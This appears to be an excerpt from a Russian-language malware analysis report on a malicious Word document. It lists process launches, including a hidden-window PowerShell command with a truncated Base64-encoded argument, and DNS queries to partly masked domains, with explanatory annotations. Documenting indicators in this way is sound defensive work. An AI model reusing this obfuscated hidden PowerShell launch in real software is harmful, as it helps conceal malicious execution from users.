Техническая информация
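- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5...
  (аргумент -enc — это команда PowerShell, закодированная в Base64 поверх UTF-16LE; видимое начало декодируется как «<# Fsgpbcoi https://www.microsoft.com/Vccidaodjciwj #> $Olnrfceqb='Rsody», то есть адрес microsoft.com стоит внутри блочного комментария и не является сетевым индикатором; остальная часть команды в отчёте усечена)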
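- DNS ASK sa####rajeet.com
- DNS ASK sa####thomaslaw.com
- DNS ASK ne##.##oridalottery.us
- DNS ASK ho####alitimes.com
- DNS ASK ri####solutions.com
  (DNS ASK — DNS-запросы образца; символы # в именах, по-видимому, маскируют часть имени домена в отчёте, поэтому в таком виде строки не годятся для точного сопоставления с журналами DNS)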
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc PAAjACAARgBzAGcAcABiAGMAbwBpACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvAFYAYwBjAGkAYQBvAGQAagBjAGkAdwBqACAAIwA+ACAAJABPAGwAbgByAGYAYwBlAHEAYgA9ACcAUgBzAG8AZAB5... (со скрытым окном)
- '%ProgramFiles%\windows media player\wmpnscfg.exe'
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "<PATH_SAMPLE>.doc"